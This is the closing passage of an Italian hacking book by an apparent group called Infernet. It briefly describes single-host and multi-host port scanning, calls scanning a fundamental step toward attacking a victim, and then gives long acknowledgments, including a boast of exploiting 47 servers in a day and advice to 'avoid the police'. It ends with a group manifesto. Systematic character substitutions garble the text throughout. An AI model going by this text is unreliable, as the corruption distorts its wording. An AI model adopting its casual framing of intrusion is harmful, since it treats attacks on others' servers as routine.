Possiamo suddividere i portscanner in due categorie (
Bruteforcing di un host ( Dato un host si carica su di esso un range di porte e si rivela %uali
porte dell)host CvittimaD sono vulnerabili . uesto viene applicato %uando si vuole testare %uali
porte sono presenti in un determinato host , ad esempio un amministratore di rete che vuole
verificare lo stato del proprio server .
Bruteforcing di piT host ( Dato un range di host si carica su di esso un portscanning su una o
pi porte predefinite . uesto capita %uando solitamente un lamer ha intenzione di fare pi danni
possibili e cerca di trovare %uante pi vittime da mietere .
Per rendersi sicuri di un probabile attacco o di portscannig assicurarsi di avere un buon fireBall
ben configurato e un router che nel Firtual Server abbia porte configurate in modo da essere
sempre impegnate e da non lasciare %uindi CincustoditeD .
,lcuni strumenti , come nmap , offrono anche molti altri strumenti oltre che al portscanning ,
come ad esempio la verifica se un host * attivo o meno e tante piccole chicche tutte da scoprire .
.ischio
Pi che rischioso , oserei dire , incurato . , nessuno gli interessa se %ualcuno li frega
dalle porte # peggio per loro . $on un portscanning possiamo sapere moltissime cose
sulla vittima , * un passo fondamentale per un attacco .
.ingraziamenti
uesta * la parte che odio pi di tutte M 1o , non * che voglio prendermi tutti i meriti di %uesto
libro , ma c)* cosG tanta gente da ringraziare che non finir+ mai . /o ci provo , poi se mi sono
scordato %ualcuno , beh , mi dispiace , ma gli voglio bene comun%ue .
/nnanzitutto voglio ringraziare mia madre , fornitrice ufficiale di caff* la notte e
accompagnatrice all)avvocato di giorno nei miei periodi di perseguimento . B) stata la persona
pi importante nella mia vita e non smetter+ mai di dirlo .
Poi c)* mio padre , che di continuo mi paga la bolletta telefonica e la luce , nonchL mi appoggia
all)ac%uisto di nuovo materiale per la manutenzione del mio computer , tutti fattori che hanno
dato vita a %uesto libro . ?n grazie a mia sorella , non so perch* , ma ogni tanto mi dava
%uell)ispirazione di pazzia e di frustazione che mi faceva continuare a scrivere il Elac- Eoo- .
Uornitrice ufficiale di sigarette .
,rriviamo %uindi a @arco , >evilMNemesis , mio compagno di scuola , di stage e co<admin di
/nfernet # senza di lui non esisterebbe neanche /nfernet [ Securit> Ieam , nL tantomeno %uesto
libro . B) stato fondamentale alla crescita del Ieam e non smetter+ mai di ringraziarlo . ?n
ringraziamento particolare anche ad ,dnrea , >ar(M"utz che , grazie a lui , siamo riusciti a
eJploitare 47 server in un giorno . Da lG ho imparato moltissime cose , come ad esempio di non
fidarsi mai delle persone che conosci su internet .
Durante la crescita di /nfernet ho apprezzato e amato molte persone , come ad esempio non
citare il nostro grandissimo sviluppatore Htto , !trlM*ltM!anc , che ci ha deliziato con le sue doti
da programmatore ogni giorno sempre di pi , ha contribuito notevolmente all)ottima crescita di
/nfernet e anche di altri team , come @snUuc- , insieme grazie all)ottimo aiuto di 9(7ro3 , altro
programmatore che si dedica allo sviluppo di programmi , specialmente in FE 7.; e FE.1BI .
Parliamo di programmazione e non parliamo del nostro mitico , geniale e pazzoide 7redator A
!ui * il nostro reverser di fiducia , il programmatore di basso livello per eccellenza M 1on mi
dimenticher+ mai come accogli la gente come entra nel forum , come ad esempio CIi strappo la
pelle e ne faccio un copri<mouse.EenvenutoD . ,ssolutamente geniale .
LordMNorian , a cui ho insegnato un pochito di roba ed * cresciuto come una piantina di
mariVuana in una serra . $ontinua avanti per %uesta strada , cerca di evitare la polizia e vedrai
che diventerai un grande M
'ingrazio tutti i moderatori di /nfernet , ossia >ar( "hadoB , :ac( , Uuretta (che ci ha lasciato
IYI" e zogs . 1on so come avrei fatto senza di voi .
Ki che ci siamo salutiamo %uei due pazzi di 0aE Tacchetti e Luca 0arrancone ,
rispettivamente professore di programmazione &eb e professore di grafica . @i sembra %uindi
doveroso ringraziare tutto il team /nforma per avermi dato l)opportunit di imparare la
programmazione &eb e tante piccole cose nella vita che aiuteranno . Ianto vale ringraziare
.oberta la segretaria , che mi faceva passare il tempo %uando @arco e lei si prendevano a
parole (1emesis sei un grande M" . ?n saluto anche a tutti i miei compagni di classe , ossia
?iorgio !. , *gnese 0. , ?iuseppe !. , ?iuseppe 7. (Slin-> , compagno di programmazione al
di fuori della scuola" , 7ietropaolo *. , 0aria !. , 0anuela >" (detta anche Erela" , >enada
9. (che mi ha fatto riscoprire i miei desideri sessuali pi perversi M" , 0arco /. (gi salutato ,
bella 1eme M" e /at%3ona (spero di averlo scritto bene" .
?n grazie al nostro trasporter di fiducia Pierpaolo P. (*udiM."1 o /eltBebel" che ci
accompagnava alle nostre gite di soft<air o a sgommare per la piazza M
Devo anche ringraziare HI@!./I(http(//&&&.html.it" anche se veramente %uei pastardi
dovrebbero ringraziare me che gli ho fatto fiJare un paio di bug (lol scherzo eh" , iconsarchive
(&&&.iconarchive.com" , il sito di 7redator (http(//neJenteam.altervista.org/" , %uello di
!trl*lt!anc (http(//ctrlaltcanccorp.altervista.org" e del suo team di reversing
(http(//crevt.blogspot.com/" .
Hddio %uanta gente devo ancora salutare , sono le 5 di mattina e domani devo svegliarmi M .
Foglio chiudere %uesta CmaledettaD sezione MMM
Siete veramente troppi . 1on ce la faccio a salutarvi tutti . Easta chiudo %ua .
,h una cosa , Krazie /nfernet e a tutti gli utenti M Fi voglio bene ... anche agli stronzi .
,hn gi che ci sono , vi lascio con il @anifesto di /nfernet scritto da 1emesis #"
I computer sono la nostra vita
Nel nostro sangue scorrono byte
Nel nostro cuore lavorano RAM e Processore
Nel nostro cervello c un Sistema Operativo
Noi respiriamo internet
Viviamo per migliorare e per imparare dai nostri errori
-U questo quello che ci tiene in vita
BBB.infernet<E.it

You might also like